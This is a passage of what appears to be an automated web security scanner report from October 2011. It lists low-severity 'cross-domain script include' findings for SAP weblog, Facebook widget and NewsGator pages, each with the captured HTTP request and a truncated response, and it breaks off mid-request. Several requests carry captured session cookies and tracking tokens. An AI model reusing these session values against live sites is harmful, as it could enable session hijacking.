<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.36. http://weblogs.sdn.sap.com/pub/u/252158907  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/252158907

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/252158907 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:03 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25016

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Abdulbasit Guls
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.37. http://weblogs.sdn.sap.com/pub/u/252196257  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/252196257

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/252196257 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:00:59 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15757

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Doug Massa</tit
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.38. http://weblogs.sdn.sap.com/pub/u/33798  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/33798

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/33798 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:01 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22605

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Laurent Gomez</
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.39. http://weblogs.sdn.sap.com/pub/u/35460  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/35460

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/35460 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:03 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 65672

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Tobias Trapp</t
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.40. http://weblogs.sdn.sap.com/pub/u/35583  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/35583

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/35583 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:29 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27911

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Matt Harding</t
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.41. http://weblogs.sdn.sap.com/pub/u/43450  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/43450

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/43450 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:00:49 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 48993

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Rui Nogueira</t
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.42. http://weblogs.sdn.sap.com/pub/u/48024  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/48024

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/48024 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:29 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14541

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Alvaro Tejada G
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.43. http://weblogs.sdn.sap.com/pub/u/5263  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/5263

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/5263 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:00:57 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35685

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Matthias Steine
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.44. http://weblogs.sdn.sap.com/pub/u/8228  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/u/8228

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/u/8228 HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:25 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 62058

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Markus Ganser</
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.45. http://weblogs.sdn.sap.com/pub/wlg/26917  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /pub/wlg/26917

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pub/wlg/26917 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/pub/wlg/26917
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:27:11 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14298


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>

   <title>SAP Network Blog: Tune in to SAP TechEd Live!</title>
   <link href="weblogs" rel="schema.DC" />
   <link rel="imag
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=scnblogs"></script>
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.46. https://weblogs.sdn.sap.com/pub/q/top_weblogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogs.sdn.sap.com
Path:   /pub/q/top_weblogs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pub/q/top_weblogs HTTP/1.1
Host: weblogs.sdn.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://weblogs.sdn.sap.com/pub/q/top_weblogs
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; a1slocale=en; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; mbox=session#1318688512533-813903#1318691765|check#true#1318689965; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Asdnweblogs%253Apopularposts%7C1318691705604%3B%20pe%3Dno%2520value%7C1318691705612%3B%20c3%3Dno%2520value%7C1318691705618%3B%20s_nr%3D1318689905628-New%7C1321281905628%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293505630%3B%20s_visit%3D1%7C1318691705632%3B%20gpv_p47%3Dno%2520value%7C1318691705635%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D5%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2f; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:45:01 GMT
Server: Apache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43374

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: Top 25 Blog Pos
...[SNIP]...
<!-- lc/google_analytics -->
<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">
</script>
...[SNIP]...
18.47. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /widgets/fan.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&channel_url=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&id=74338051990&name=&width=680&connections=24&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.connect.facebook.com/widgets/fan.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&channel_url=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&id=74338051990&name=&width=680&connections=24&stream=0&logobar=1&css=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.23.120
X-Cnection: close
Date: Sat, 15 Oct 2011 14:24:03 GMT
Content-Length: 13779

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/_cfwtJx3PKr.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tdzDCyl-epH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/MLA5OeE4JOL.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/aT2XtcxArxH.js"></script>
...[SNIP]...
18.48. http://www.newsgator.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:29:04 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 52954
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<span><script defer="defer" type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script><script defer="defer" type="text/javascript" src="http://twitter.com/statuses/user_timeline/newsgator.json?callback=twitterCallback2&amp;count=2"></script>
...[SNIP]...
</div>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
18.49. http://www.newsgator.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /Default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Default.aspx?tabid=214 HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.newsgator.com/Default.aspx?tabid=214
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; __utma=1.930474175.1318692366.1318692366.1318692366.1; __utmb=1.1.10.1318692366; __utmc=1; __utmz=1.1318692366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:26:01 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 39297
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</div>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
18.50. http://www.newsgator.com/customers.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /customers.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /customers.aspx HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.newsgator.com/customers.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=116641049.1396705175.1318692392.1318692392.1318692392.1; __utmb=116641049.1.10.1318692392; __utmc=116641049; __utmz=116641049.1318692392.1.1.utmcsr=newsgator.com|utmccn=(referral)|utmcmd=referral|utmcct=/Default.aspx; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:26:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 110930
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</div>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
18.51. http://www.newsgator.com/partners/become-a-newsgator-partner.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /partners/become-a-newsgator-partner.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/become-a-newsgator-partner.aspx HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.newsgator.com/partners/become-a-newsgator-partner.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; Agg469_SelectedElementId=1; __utma=1.1111194646.1318692406.1318692406.1318692406.1; __utmb=1.3.10.1318692406; __utmc=1; __utmz=1.1318692406.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Agg1216_SelectedElementId=5; DNNSTUFF_Aggregator=1217=5; language=en-US; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:29:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 52034
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</div>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
18.52. http://www.newsgator.com/partners/channel-partners.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /partners/channel-partners.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/channel-partners.aspx HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.newsgator.com/partners/channel-partners.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; Agg469_SelectedElementId=1; Agg1216_SelectedElementId=5; DNNSTUFF_Aggregator=1217=5; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; __utma=1.1111194646.1318692406.1318692406.1318692406.1; __utmb=1.4.10.1318692406; __utmc=1; __utmz=1.1318692406.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:29:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 64631
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</div>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
18.53. http://www.newsgator.com/products/social-sites-for-sharepoint-2007-moss.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /products/social-sites-for-sharepoint-2007-moss.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/social-sites-for-sharepoint-2007-moss.aspx HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
